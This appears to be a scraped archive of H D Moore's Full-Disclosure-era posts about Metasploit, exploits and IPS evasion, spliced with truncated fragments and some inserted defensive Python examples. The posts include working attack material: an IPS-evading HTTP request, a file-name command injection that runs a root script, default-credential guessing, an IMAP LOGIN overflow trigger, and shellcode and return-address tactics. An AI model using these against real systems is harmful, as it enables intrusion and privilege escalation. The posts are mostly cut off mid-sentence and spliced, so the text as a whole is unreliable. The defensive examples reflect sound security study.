Contact: H D Moore FOR IMMEDIATE RELEASE
Email: hdm[at]metasploit.com
Austin, Te
You can find our SecTOR presentation online at:
http://metasploit.com/research/conferences/
Grab an early of 3.2 (testing) from SVN:
$ svn co http://metasploit.com/svn/framework3/trunk/ msf32/
A little bit about the new licensing (much more to follow):
http://www.darkreading.com/document.as
On Friday 25 July 2008, tixxDZ wrote:
> I do not want to offend anyone (Metasploit people), this is a simple
> joke: can you share with us all the logs of the vulnerable servers ?
> ;) , the exploit will use the Metasploit service to verify
> exploitability. ex checking my Opendns:
The exploit nee
Problem solved. Someone is ARP poisoning the IP address of the router on which
the www.metasploit.com server resides.
I hardcoded an ARP entry for the real router and that seems to solve the MITM
issue. It doesn't help the other 250 servers
on that network, but that's an issue for the ISP to res
Looks like someone is doing ARP poisoning at the ISP level. The actual
metasploit.com server(s) are untouched, but someone is still managing to
MITM a large portion of the incoming traffic. To make things even more
fun, it's coinciding with a DoS attack (syn floods) on most of the open
services
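As an added illustration (not code from this thread or from Metasploit): the check that a hardcoded entry for the real router is meant to enforce is "the gateway's MAC never changes". The function below parses the kernel ARP table, flags a gateway MAC that differs from a pinned baseline, and reports whether the entry is static. The table text is constructed in /proc/net/arp layout with made-up addresses; the interface name and the iproute2 pin command are assumptions for Linux.

```python
"""Detect a gateway MAC that drifts from a pinned baseline.

Added example, not from the original thread or from Metasploit.  The ARP
table text is constructed in /proc/net/arp layout with made-up addresses.
"""

# Flag bits from <net/if_arp.h>: ATF_COM = entry resolved, ATF_PERM = static.
ATF_COM = 0x02
ATF_PERM = 0x04

# Constructed baseline: the table before the trouble started.
BASELINE_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
10.0.0.1         0x1         0x2         00:11:22:33:44:55     *        eth0
10.0.0.23        0x1         0x2         aa:bb:cc:dd:ee:01     *        eth0
"""

# Constructed later snapshot: the router IP now resolves to another MAC, and
# an incomplete entry (flags 0x0) is present and must be ignored.
POISONED_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
10.0.0.1         0x1         0x2         de:ad:be:ef:00:01     *        eth0
10.0.0.23        0x1         0x2         aa:bb:cc:dd:ee:01     *        eth0
10.0.0.99        0x1         0x0         00:00:00:00:00:00     *        eth0
"""


def parse_proc_net_arp(text):
    """Return {ip: (mac, flags)} for resolved entries; skip the header and incomplete rows."""
    table = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], int(fields[2], 16), fields[3].lower()
        if flags & ATF_COM:
            table[ip] = (mac, flags)
    return table


def gateway_drift(baseline_text, snapshot_text, gateway_ip):
    """Return (old_mac, new_mac) when the gateway's MAC changed, else None."""
    old = parse_proc_net_arp(baseline_text).get(gateway_ip)
    new = parse_proc_net_arp(snapshot_text).get(gateway_ip)
    if old is None or new is None or old[0] == new[0]:
        return None
    return old[0], new[0]


def is_pinned(snapshot_text, gateway_ip):
    """True when the gateway entry is static (ATF_PERM), i.e. a hardcoded ARP entry is in place."""
    entry = parse_proc_net_arp(snapshot_text).get(gateway_ip)
    return bool(entry and entry[1] & ATF_PERM)


def pin_command(gateway_ip, mac, dev):
    """iproute2 form of the static entry (assumed Linux host; `arp -s` is the older form)."""
    return "ip neigh replace %s lladdr %s dev %s nud permanent" % (gateway_ip, mac, dev)


if __name__ == "__main__":
    drift = gateway_drift(BASELINE_TABLE, POISONED_TABLE, "10.0.0.1")
    if drift:
        print("gateway MAC changed: %s -> %s" % drift)
        print("pin it with:", pin_command("10.0.0.1", drift[0], "eth0"))
```

Run it periodically against a fresh read of /proc/net/arp; a static entry only protects the host it is set on, which is the point made above about the other servers on the segment.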
http://metasploit.com/users/hdm/tools/debian-openssl/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
The WebKit folks just added client-side SQL database support:
http://webkit.org/blog/126/webkit-does-html5-client-side-database-storage/
http://glazkov.com/blog/html5-gears-wrapper/
In addition to all of the existing attacks through a web browser, we can
now take into account SQLite vulnerabili
Available online at:
https://strikecenter.bpointsys.com/
-HD
ative
folks in the security research community" said H D Moore, project
manager. Moore is referring to the numerous research projects that have
lent code to the framework.
These projects include the METASM pure-ruby assembler developed by
Yoann Guillot and Julien Tinnes, the "Hacking the
Use 0x71aa15cf for pop/pop/ret on WinXP SP2/SP3 English
Download the mini-database here:
http://metasploit.com/users/hdm/tools/opcodes_xp_sp2_sp3.tar.gz
From the README:
This package contains a text listing of addresses which can be useful for
exploitation. Each subdirectory represents a type
Changes between DCERPC services on XP SP2 and XP SP3 (release candidate)
This is from a quick and dirty unmidl.py + diff(3) session[1]
Results do not include new services bundled with SP3.
Results are likely incomplete.
Verify this with mIDA.
Happy holidays.
Thanks Dave
For UNMIDL
Cheers,
-HD
--
The last part of my iPhone-related blog entries was posted last night. The
first article discusses the architecture and provides some useful
shellcode for already-modified phones.
http://blog.metasploit.com/2007/09/root-shell-in-my-pocket-and-maybe-yours.html
The second article discusses the
Good point! I didn't like the intro that much, it will be revisited in the
next revision :-) Thanks for the feedback!
-HD
On Thursday 09 August 2007 19:24, Hernan Ochoa wrote:
> The only thing I would argue is the concept that your paper is actually
> 'INTRODUCING a tactical approach to penetrati
At Black Hat 2007 and Defcon 15, Valsmith and I gave a talk
entitled "Tactical Exploitation". This talk introduced a tactical
approach to penetration testing that does not rely on exploiting known
vulnerabilities. During the talk, we used a combination of new tools and
lesser-known techniques t
Apparently I can't read before 10:00am :) 3APA3A corrected me, the RFC
states that there can actually be multiple CRLF before the start of the
request. Time to find some coffee...
Thanks for the feedback!
-HD
On Wednesday 20 June 2007 09:19, H D Moore wrote:
> The note in RFC 2616,
Agreed. The point was that IPS vendors have put a large amount of effort
into normalizing IIS-specific encodings, but fail to handle
Apache-specific quirks.
The note in RFC 2616, Section 4.1, refers to a single CRLF before the
Request-Line. Prepending multiple CRLFs or non-printable character
Summarized from https://strikecenter.bpointsys.com/
Many commercial IPS products fail to decode HTTP requests which use 0x0c,
0x0b, and 0x0d instead of the normal 0x20/0x09 separators. A request in
the following format will evade most IPS protocol decoders:
$ echo -ne "GET\x0c/cgi-bin/phf\x0cHT
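An added example (not from the post above, and not the Strike Center's or Metasploit's code) of the two decoding choices the thread turns on: which bytes count as Request-Line separators, and how many leading CRLFs are skipped. The lenient tokenizer mirrors what a server using C isspace() accepts (SP, HT, VT, FF, CR); the strict one is what a decoder that only knows SP/HT and a single CRLF sees. The requests are constructed.

```python
"""Tokenize an HTTP Request-Line the way a lenient server does versus the way a
naive decoder does.  Added example, not from the original post or the Strike
Center; the requests below are constructed.
"""
from typing import Dict, List, Optional

# Separators a naive decoder knows: SP and HT (RFC 2616 Request-Line grammar).
STRICT_SEPARATORS = b" \t"
# Separators accepted by a server that tokenizes with C isspace(): SP, HT, VT,
# FF, CR.  Assumption for this example: a decoder has to accept the same set
# to see the request the server sees.
LENIENT_SEPARATORS = b" \t\x0b\x0c\x0d"


def split_request_line(line: bytes, separators: bytes) -> List[bytes]:
    """Split on any byte in `separators`, collapsing runs of them."""
    tokens, cur = [], bytearray()
    for b in line:
        if b in separators:
            if cur:
                tokens.append(bytes(cur))
                cur = bytearray()
        else:
            cur.append(b)
    if cur:
        tokens.append(bytes(cur))
    return tokens


def parse_request_line(raw: bytes, lenient: bool = True) -> Optional[Dict[str, bytes]]:
    """Return {'method', 'uri', 'version'} or None if the line does not decode."""
    if lenient:
        # RFC 2616 4.1: ignore CRLFs before the Request-Line; as the thread
        # notes, there can be more than one of them.
        data = raw.lstrip(b"\r\n")
    else:
        data = raw[2:] if raw.startswith(b"\r\n") else raw   # tolerates exactly one CRLF
    first = data.split(b"\n", 1)[0].rstrip(b"\r")
    parts = split_request_line(first, LENIENT_SEPARATORS if lenient else STRICT_SEPARATORS)
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    return {"method": parts[0], "uri": parts[1], "version": parts[2]}


def signature_matches(raw: bytes, needle: bytes, lenient: bool) -> bool:
    """Content match against the decoded URI, i.e. what a protocol-aware IPS rule does."""
    req = parse_request_line(raw, lenient)
    return req is not None and needle in req["uri"]


# Constructed samples: the evasive form from the post, and a plain request
# preceded by several CRLFs.
EVASIVE = b"GET\x0c/cgi-bin/phf\x0cHTTP/1.0\r\n\r\n"
PLAIN = b"\r\n\r\n\r\nGET /cgi-bin/phf HTTP/1.0\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("evasive", EVASIVE), ("plain", PLAIN)):
        print(label, "lenient:", parse_request_line(req), "strict:", parse_request_line(req, False))
```

The strict decoder returns None for both samples, so a rule keyed on the decoded URI never fires; the lenient decoder recovers /cgi-bin/phf from both. Normalizing to the server's view before matching is the whole fix.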
this someone was (confirmed) not
David. SecureWorks is based in Atlanta. All times are CDT.
I sent the following message last night at 7:02pm.
---
From: H D Moore
To: David Maynor
Subject: Zero-day I promised
Date: Tue, 5 Jun 2007 19:02:11 -0500
User-Agent: KMail/1.9.3
MIME-Version: 1.0
Co
Metasploit 2 only runs modules written in the Metasploit 2 Perl format.
Metasploit 3 only runs modules written in the Metasploit 3 Ruby format.
Keep in mind that many exploits also depend on a specific version or
update of the Metasploit Framework. If the exploit is for Metasploit 3
and uses th
Two new exploit modules are available for version 3.0 of the Metasploit
Framework. These modules can be obtained by using the 'Online Update'
feature in Windows and the 'svn update' command on Unix-like systems.
Matt Miller posted to the Metasploit Blog about our ANI efforts:
http://blog.metaspl
March 27th, 2007 -- Metasploit is pleased to announce the immediate,
free availability of the Metasploit Framework version 3.0 from
http://framework.metasploit.com/.
The Metasploit Framework ("Metasploit") is a development platform for
creating security tools and exploits. Version 3.0 contains 17
It might be more effective to contribute to the Wireshark Wiki:
- http://wiki.wireshark.org/SampleCaptures
-HD
On Wednesday 14 February 2007 11:17, crazy frog crazy frog wrote:
> As it is not possible for everyone to setup different networks
> quickly, I am thinking to start a wiki which will con
Try using root:root, root:admin, admin:admin, and radmin:radmin via telnet
and ssh for these systems:
http://www.linuxforums.org/forum/other-distributions/63848-help-linux-version.html
-HD
On Friday 09 February 2007 05:22, Mark Sec wrote:
> any1 have experience over these "boxes"?, we have man
Shiny new (remote) kernel-mode exploits for Metasploit 3:
http://kernelfun.blogspot.com/2006/11/mokb-13-11-2006-d-link-dwl-g132.html
http://kernelfun.blogspot.com/2006/11/mokb-11-11-2006-broadcom-wireless.html
-HD
Doh. I read too quickly. Ryan Naraine pointed out that there is no patch,
the advisory just confirms that people are exploiting it.
-HD
On Wednesday 01 November 2006 13:21, H D Moore wrote:
> http://www.microsoft.com/technet/security/advisory/927709.m
http://www.microsoft.com/technet/security/advisory/927709.mspx
The Metasploit 2 module (ie_createobject)[1] has been exploiting this bug
since it was released in August. Glad to see they finally noticed.
Thanks to Aviv for noticing / sending me the link.
-HD
1. http://metasploit.com/projects/F
Lorenzo's Kernel Fun project:
http://kernelfun.blogspot.com/
The Metasploit 3 exploit module:
http://metasploit.com/svn/framework3/trunk/modules/auxiliary/dos/wireless/daringphucball.rb
Media coverage so far:
http://www.securityfocus.com/brief/344
http://www.darkreading.com/document.asp?doc_id=10
The Metasploit Framework is an advanced open-source exploit development
platform. The 3.0 tree represents a complete rewrite of the 2.0 codebase
and provides a scalable and extensible framework for security tool
development. The 3.0 Beta 3 release includes support for exploit
automation[1], 802
The Metasploit Framework is an advanced open-source exploit development
platform. The 2.7 release includes three user interfaces, 157 exploits
and 76 payloads. The Framework will run on any modern operating system
that has a working Perl interpreter. The Windows installer includes a
slimmed-down
Nice work Aviv! All of these methods, along with a few extras, are
implemented in the Metasploit 2.6 version of this module. Last I checked,
not a single AV or IPS could pick it up. This module should work on every
version and service pack of Windows.
http://metasploit.com/projects/Framework/ex
The exploit for NT 4.0 is *exactly* the same packet as the one you would
also use on Windows 2000. I am surprised that this is considered a "NT 4"
worm and not a "Windows 2000 (+NT 4.0)" worm. Is something specific about
the exploit they use that prevents it from working on Windows 2000?
-HD
On
On Saturday 12 August 2006 12:16, Thierry Zoller wrote:
> OHoh, when can we expect a DNS tunnel, tunneling a shell through your
> DNS requests and DNS answers ? :) A nice remote shell through dns
> tunnel over XSS. LOL :)
Heh. I actually have a plan for doing that :-)
1) Create a metasploit paylo
Hello,
I worked on something similar, it uses Java in the same way, but also uses
a custom DNS server to obtain even more information:
Demo:
http://metasploit.com/research/misc/decloak/
Code:
http://metasploit.com/research/misc/decloak/HelloWorld.java
-HD
On Saturday 12 August 2006 03:55, pdp
The DLLs for XP SP2 and 2003 SP1 were compiled with Visual Studio's stack
protection flag (/GS). This prevents a standard return address overwrite
from working. The wcscpy() method everyone is using in their exploits is
also blocked by another change in how the compiler orders and passes
argume
At some point, depending on time. Feel free to add one :-)
-HD
On Thursday 10 August 2006 06:03, David Taylor wrote:
> Hi HD,
>
> Do you plan on building a 'check' feature into this in the future? I
> find those to be very handy in scripting checks on our systems.
:
http://metasploit.com/projects/Framework/modules/exploits/netapi_ms06_040.pm
-- Forwarded Message --
Subject: [framework] Metasploit Framework Updates
Date: Thursday 10 August 2006 02:52
From: H D Moore <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Hello everyone,
I just pushed out a
Core Impact and Canvas both have exploits out. Metasploit technically has
one, but it hasn't been completed/released yet.
-HD
On Wednesday 09 August 2006 13:10, Matt Davis wrote:
> Did I completely miss exploit code being released in the wild for that
> vulnerability?
AxMan is now public:
- http://metasploit.com/users/hdm/tools/axman/
-HD
for all the feedback!
-HD
On Friday 28 July 2006 13:47, H D Moore wrote:
> The demonstration exploit now works on Windows, Linux, and both
> architectures of Mac OS X. A friend of mine reported that it also works
> on the Camino browser:
>
> http://browserfun.blogspot.com/2006/07/
The demonstration exploit now works on Windows, Linux, and both
architectures of Mac OS X. A friend of mine reported that it also works
on the Camino browser:
http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html
Enjoy,
-HD
http://metasploit.com/research/misc/mwsearch/?q=bagle
Enjoy,
-HD
Yet another SMB memory leak. There are tons of these in SRVSVC. The key to
finding them is to force large padding values (ie. holes between
DataOffset/ParameterOffset and end of packet). A quick hack is to use the
SMB ECHO command with a non-aligned byte size. I have yet to see anything
actuall
I have been receiving spam to unique addresses provided to H&R Block for
over a year now. If this is the same company you used, you aren't the
only one. Using an email address with the original company name clearly
embedded within it makes tracking down this kind of abuse easier. It has
a side
"bad" traffic that happens to exit through your node (attempted server
exploitation, pornography not involving adults, etc). My current
implementation uses an embedded ruby interpreter and a set of ruby modules
to perform the protocol detection and filtering.
Thanks for testing!
-HD
On Mo
A fun browser toy that depends on Java for complete results:
- http://metasploit.com/research/misc/decloak/
-HD
Install the Metasploit Framework (v2.5), then use msfpescan:
$ msfpescan -f something.dll -D | grep IAT
-HD
On Monday 22 May 2006 10:43, Andres Molinetti wrote:
> I want to find if a specific function is defined in a given set of
> dlls' IAT (Import Address Table).
> Does anyone know a tool
No need to patch the client at all. The Metasploit Framework module
proxies the connection and lets you exploit the flaw with any standard
client. If you have vncviewer in your path (or are running the Windows
version of the Framework), it also auto-connects :-)
-HD
http://metasploit.com/proje
I don't believe you understand - the exploit details were available to
anyone who could access Metalink. Alexander did not disclose these flaws,
the Oracle user who posted the bug report did. The only reason Oracle
takes security seriously is because folks like Mr. Kornbrust and Mr.
Litchfield a
On Thursday 23 March 2006 13:44, Georgi Guninski wrote:
> a triple more reasons to send all of your 0days to m$:
Can always count on you Georgi :-)
> 1. only you can save mankind
> (they still need you, so it is not clear if several years old
> tru$tworthy computing can save mankind)
You are
How many bugs can you find in your browser? The recent IE issues only scratched
the surface of the DHTML/behavior bugs. The HTML/JS page below can be
used to find all sorts of bugs in different browsers. I stopped caring
about these after the first three invalid dereferences.
http://metasploit.com/use
These work great:
http://www.udrw.com/
-HD
On Tuesday 21 March 2006 11:24, Pego, Victor wrote:
> Hi,
>
> I need to figure out how to autorun a file on a USB flash pen drive.
> Just like you can do with a CD - put it in and it starts running the
> program - I want to do with the pen drive. I've re
Works well against Firefox 1.5.0.1 on the following systems:
- Windows XP SP2
- Windows 2003 SP0
- Windows 2000 SP4
However, it does not work with Opera 8.5 on any platform. Should just be a
matter of changing return addresses based on the user-agent though...
-HD
On Friday 17 February 2006 02:
On Friday 17 February 2006 02:05, Matthew Murphy wrote:
> Interesting issue with regards to the module-list pointers.
[ snip ]
> The heap spray technique works very effectively -- you end up with a
> *sizable* pad in the 0x04a0 region which you can use as a direct
> jump point for the paylo
On Thursday 16 February 2006 19:15, c0ntex wrote:
> On 16/02/06, H D Moore <[EMAIL PROTECTED]> wrote:
> > Still getting some annoying crashes (SEH trick in alphanum code is
> > annoying when you are trying to debug something...), but the basic
> > solution is:
>
Still getting some annoying crashes (SEH trick in alphanum code is
annoying when you are trying to debug something...), but the basic
solution is:
1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted byte
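Added example (not the poster's code and not Metasploit): a screen for the return-address constraints listed above, which also serves the XP SP2/SP3 pop/pop/ret post earlier on this page. The only address taken from the page is 0x71aa15cf; the others are made up for illustration, and whether any of them lands in a loaded module is not something this check knows.

```python
"""Screen candidate return addresses against the byte restrictions of a filter.

Added example, not from the post or from Metasploit.  Apart from 0x71aa15cf
(quoted from the page as a WinXP SP2/SP3 pop/pop/ret) the addresses are made up.
"""
import string

ALNUM = set(string.ascii_letters.encode() + string.digits.encode())


def le_bytes(addr: int, width: int = 4) -> bytes:
    """The bytes that actually land in the buffer: little-endian on x86."""
    return addr.to_bytes(width, "little")


def violations(addr: int, badchars: bytes = b"\x00", max_byte: int = 0xFF) -> list:
    """Bytes of `addr` that are in `badchars` or above `max_byte` (0x7F for a 7-bit filter)."""
    return [b for b in le_bytes(addr) if b in badchars or b > max_byte]


def is_usable(addr: int, badchars: bytes = b"\x00", max_byte: int = 0xFF) -> bool:
    return not violations(addr, badchars, max_byte)


def is_alphanumeric(addr: int) -> bool:
    """True if every byte is [0-9A-Za-z], so the address survives an alphanumeric-only filter."""
    return all(b in ALNUM for b in le_bytes(addr))


def first_usable(candidates, badchars: bytes = b"\x00", max_byte: int = 0xFF):
    """Pick the first candidate that survives the filter, or None if none does."""
    for addr in candidates:
        if is_usable(addr, badchars, max_byte):
            return addr
    return None


if __name__ == "__main__":
    for addr in (0x71aa15cf, 0x7c0012e0, 0x7c341234, 0x41424344):
        print("0x%08x bad=%s alnum=%s" % (addr, ["%02x" % b for b in violations(addr, max_byte=0x7F)],
                                         is_alphanumeric(addr)))
```

The pop/pop/ret address from the SP2/SP3 post passes a NUL-only filter but not the "nothing over 0x7F" rule from this thread: its low and third bytes (0xcf, 0xaa) are both high-bit, so it would need to be swapped for another candidate before the alphanumeric payload approach above would work.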
day 23 January 2006 08:40, H D Moore wrote:
> Nice DoS bug, next time try emailing us first :-)
>
> -HD
>
> On Monday 23 January 2006 04:23, cranium pain wrote:
> > WMF Exploit vulnerable?
> >
> > [*] Starting Reverse Handler.
> > [*] Waiting for connectio
Nice DoS bug, next time try emailing us first :-)
-HD
On Monday 23 January 2006 04:23, cranium pain wrote:
> WMF Exploit vulnerable?
>
> [*] Starting Reverse Handler.
> [*] Waiting for connections to http://0.0.0.0:80/
> [*] Got connection from 0.0.0.0:443 <-> 1.1.1.1:42121
> [*] Sending Stage (2
://www.sensepost.com/research/bidiblah/
The next version of the Metasploit Framework (v3) has support for 'recon'
modules that technically you could use to automate this, but it will take
some time before this is usable.
-HD
On Tuesday 17 January 2006 18:04, H D Moore wrote:
> You should
You should check out the Metasploit Framework:
- http://metasploit.com/projects/Framework/
When I viewed the online demo of SAINT Exploit in December of 2005, nearly
all of their exploit modules had names very similar to the ones found in
version 2.5 of the Metasploit Framework. The demo has b
Any chance you contacted Wehnus about it? The "hot fix" is just to open
regedit, browse to this key, and place the command line quotes. Minor
problem, but I am sure Matt would have appreciated an email first.
-HD
On Monday 16 January 2006 14:47, Thierry Zoller wrote:
> Dear List,
>
> Small blu
---
wine-20050930/dlls/gdi/driver.c
---
/**
Escape [EMAIL PROTECTED]
*/
INT WINAPI Escape( HDC hdc, INT escape, INT in_count, LPCSTR in_data,
LPVOID out_data )
{
INT ret;
POINT *pt;
switch (escape)
{
ca
Q) Why did you release an IDS and AV evading exploit module so soon after
the vulnerability was discovered?
A) The vulnerability was being exploited, in the wild, for at least two
weeks (based on email reports) prior to the original BT post. The WMF
structure is widely documented. The AV vendor
From my experience on XP/2003, IE will only render WMF files as images if
the "placeable" header has been added before the WMF header. The addition
of the "placeable" header prevents the SetAbortProc from being reached in
the Escape() function, due to a check on the device context (credits to
m
We just released a new version of the Metasploit Framework exploit module
for the Escape/SetAbortFunc code execution flaw. This module now pads the
Escape() call with random WMF records. You may want to double check your
IDS signatures -- most of the ones I saw today could be easily bypassed
or
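Added example, not Metasploit code and not any vendor's signature: a record walker that finds an Escape/SetAbortProc record wherever it sits in the file, next to the fixed-offset check that the random-padding change defeats. The WMF files are constructed here from the documented record layout (32-bit size in words, 16-bit function, parameters); the filler record and the escape payload bytes are stand-ins.

```python
"""Walk WMF records and decide whether an Escape/SetAbortProc record is present,
no matter how many filler records precede it.

Added example, not Metasploit code and not a vendor signature; the sample
files are constructed below.  Each record is a 32-bit size in 16-bit words,
a 16-bit function number, then parameters.
"""
import struct

PLACEABLE_KEY = 0x9AC6CDD7     # Aldus placeable header magic, 22-byte header
META_EOF = 0x0000
META_SETBKMODE = 0x0102        # harmless record used as filler here
META_ESCAPE = 0x0626
SETABORTPROC = 0x0009          # Escape sub-function behind the code-execution flaw


def strip_placeable(data: bytes):
    """Return (body, had_placeable): drop the 22-byte placeable header if present."""
    if len(data) >= 22 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        return data[22:], True
    return data, False


def iter_records(data: bytes):
    """Yield (function, params) per record, stopping at EOF or a malformed size."""
    body, _ = strip_placeable(data)
    if len(body) < 18:
        return
    header_words = struct.unpack_from("<H", body, 2)[0]     # HeaderSize, normally 9
    off = header_words * 2
    while off + 6 <= len(body):
        size_words, func = struct.unpack_from("<IH", body, off)
        size = size_words * 2
        if size < 6 or off + size > len(body):
            return                                          # never read past the buffer
        yield func, body[off + 6:off + size]
        if func == META_EOF:
            return
        off += size


def has_setabortproc(data: bytes) -> bool:
    """Record-walking check: any Escape record whose EscapeFunction is SETABORTPROC."""
    for func, params in iter_records(data):
        if func == META_ESCAPE and len(params) >= 2 \
                and struct.unpack_from("<H", params, 0)[0] == SETABORTPROC:
            return True
    return False


def fixed_offset_signature(data: bytes) -> bool:
    """Naive check that only inspects the first record after the 18-byte header."""
    body, _ = strip_placeable(data)
    if len(body) < 26:
        return False
    func, escape_fn = struct.unpack_from("<HH", body, 18 + 4)
    return func == META_ESCAPE and escape_fn == SETABORTPROC


def record(func: int, params: bytes = b"") -> bytes:
    params += b"\x00" * (len(params) % 2)                   # records are word-aligned
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_sample(filler_count: int, placeable: bool = False) -> bytes:
    """Constructed WMF: `filler_count` padding records, then Escape/SetAbortProc, then EOF."""
    recs = b"".join(record(META_SETBKMODE, struct.pack("<H", 1)) for _ in range(filler_count))
    esc_data = b"A" * 16                                    # stand-in for the escape payload
    recs += record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, len(esc_data)) + esc_data)
    recs += record(META_EOF)
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (18 + len(recs)) // 2, 0, 13, 0)
    wmf = header + recs
    if placeable:
        wmf = struct.pack("<IHhhhhHIH", PLACEABLE_KEY, 0, 0, 0, 100, 100, 96, 0, 0) + wmf
    return wmf


if __name__ == "__main__":
    for n in (0, 5):
        sample = build_sample(n)
        print("filler=%d walker=%s fixed_offset=%s" % (n, has_setabortproc(sample),
                                                        fixed_offset_signature(sample)))
```

The walker also copes with the placeable header from the post below, which shifts every offset by 22 bytes; a signature anchored on raw file offsets misses both that and the padded form.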
On Wednesday 28 December 2005 19:16, Nick FitzGerald wrote:
> The fact it was used for installing spyware (and may have been so for
> near on two weeks now) simply shows you where the money is these days.
It's a sad state of affairs when $19.95 crapware scams make more money than
cleaning out a fe
In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded
I ported the exploit to the Metasploit Framework in case anyone wants to
test it without installing a thousand spyware apps...
Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:
--http://metasploit.com/p
This may not be a limitation if you can use the argument-skipping syntax
in msvcrt (ie. %4000$x).
-HD
On Friday 16 December 2005 08:32, FistFucker wrote:
>I don't think it's > exploitable because the user controlled string is
>many thousand bytes away from the stack pointer and you can only send
The Metasploit staff is proud to present the first alpha release of the
3.0 branch of the Metasploit Framework. This release marks a major
milestone in the evolution of the Metasploit Framework and is based on a
complete rewrite of the 2.x series.
The 3.0 branch is designed to provide automatio
Assuming that the find command will report a directory or file that you
control,
you can use the symlink to overwrite a shell script, and then place shell
commands
into your file name:
$ mkdir \`cd\..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ tmp\;sh\ root.sh\`
$ echo id > /tmp/root.sh
$ chm
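Added example (not from the post): the mechanism the mkdir trick relies on is a script that pastes a file name into a string the shell re-parses, so the backticks in the name become command substitution. The snippet shows that string next to its quoted form and runs both through /bin/sh. The directory name is constructed (it runs a harmless echo rather than a root shell script), and /bin/sh is assumed to be present.

```python
"""Why a command-bearing file name gets executed, and how to neutralise it.

Added example, not from the post.  The name below is constructed; the post's
version runs a script via the same mechanism.  Needs /bin/sh to demonstrate.
"""
import shlex
import subprocess

EVIL_NAME = "`echo INJECTED`"          # constructed attacker-chosen directory name


def vulnerable_command(name: str) -> str:
    # The pattern behind the bug: the name is pasted into a string the shell
    # re-parses (sh -c "...$name...", eval, or a cron script that does the same).
    return "echo " + name


def safe_command(name: str) -> str:
    # Single-quoting makes backticks, $(...), ';' and whitespace literal.
    return "echo " + shlex.quote(name)


def run_through_shell(cmdline: str) -> str:
    """Hand the string to /bin/sh exactly as the vulnerable script would; return stdout."""
    out = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def has_shell_metachars(name: str) -> bool:
    """Cheap triage for names that should never reach a shell unquoted."""
    return any(c in name for c in "`$;|&<>()\n")


if __name__ == "__main__":
    print("vulnerable:", run_through_shell(vulnerable_command(EVIL_NAME)))
    print("quoted    :", run_through_shell(safe_command(EVIL_NAME)))
```

Quoting is the repair when a shell string is unavoidable; the better fix is to not build one at all and pass the name as its own argv element (subprocess.run(["ls", "-d", "--", name])), which the symlink-overwritten script in the post also cannot be coaxed into re-parsing.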
Hi everyone,
Looks like some overzealous idiot at McAfee added "Trojan" signatures for
202 files in the latest version of the Metasploit Framework. If you use
the Framework for your job and have a McAfee support contract, *please*
call them and let them know that their product is incorrectly ta
The Metasploit Project has released three new vulnerability sets and a
password dumping extension to the Meterpreter payload. Enjoy!
-HD
[ PGP Desktop Wipe Free Space Flaw ]
PGP Desktop includes a Wipe Free Space utility that claims to eliminate
data in all the free space on your hard drive in
I found an old document and some crappy perl code on my system, figured
someone might find it interesting:
"Unauthorized network links are one of the biggest problems facing large
enterprise networks. Users intent on bypassing corporate proxies will
often use cable modems, wireless networks, or
905856\$vs")'
-HD
On Tuesday 29 November 2005 11:15, H D Moore wrote:
> On Tuesday 29 November 2005 04:07, [EMAIL PROTECTED] wrote:
> > [snip ] so so if remote code execution is successful, it would
> > lead to a full remote root com
On Tuesday 29 November 2005 04:07, [EMAIL PROTECTED] wrote:
> [snip ] so so if remote code execution is successful, it would
> lead to a full remote root compromise in a standard configuration.
> DESCRIPTION. The username parameter of the login form is logged via
> the perl `syslog' facility in
Execution flaw: google_proxystylesheet_exec.
No code is required to exploit the other flaws.
Researcher(s):
H D Moore (hdm[at]metasploit.com)
Vulnerability Details:
The Google Search Appliance search interface uses the 'proxystylesheet'
form variable to determine what style sheet t
I believe 5.2 and 5.3 are vulnerable as well, there are other fun bugs
hiding in there too :) Filemon rocks.
-HD
On Tuesday 25 October 2005 15:26, Bernhard Mueller wrote:
> This flaw was discovered in version 5.1 of RSA Agent for Web. No other
> versions were available for testing. Web Agents >5
Attached some in-progress code for the snort bug, getting through the
while() loop that modifies both 'i' and 'len' is annoying. Any ideas on
making this more reliable? It works great on my -ggdb version , but runs
off a page during a memcmp() on my normal binary.
-HD
snort_bo_ping.pm
Descrip
The Metasploit Framework is an advanced open-source exploit
development platform. The 2.5 release includes three user interfaces,
105 exploits and 75 payloads.
The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down v
It doesn't work that way ;-) You either get to abuse the bug or tell
them about it; trying to do both is what gets people put into jail. In
your communication with the company, you could always ask for a discount
on your service or some other perk (in a polite and non-demanding way),
but IM
Does anyone have an idea on how to trigger this? Debian and SuSE say this
is a denial of service. Gentoo says "code execution", but they are the
ones who found the bug. Most zlib bugs can be exploited prior to
authentication in OpenSSH. The patch is being distributed by the
vendors and is
The Metasploit Framework is an advanced open-source exploit
development platform. The 2.4 release includes three user interfaces,
72 exploits and 75 payloads.
The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down ve
Marc,
I will buy you *two* Xboxes for a nice IIS 6.0 remote :-)
Seriously, the "market value" of a remote exploit for IIS 6.0 is
somewhere between two and twenty thousand dollars, depending on how
shady you want to get. These "find some 0day and give it to us"
challenges are a waste of time
If you care at all about security, run, don't walk, away from this
software. Another simple overflow via the "LOGIN" IMAP command:
A001 LOGIN (>1024 bytes)\r\n
-HD
On Tuesday 05 April 2005 12:31, expanders wrote:
> -=[+] Application:Mail Enable Imapd ( MEIMAP.exe )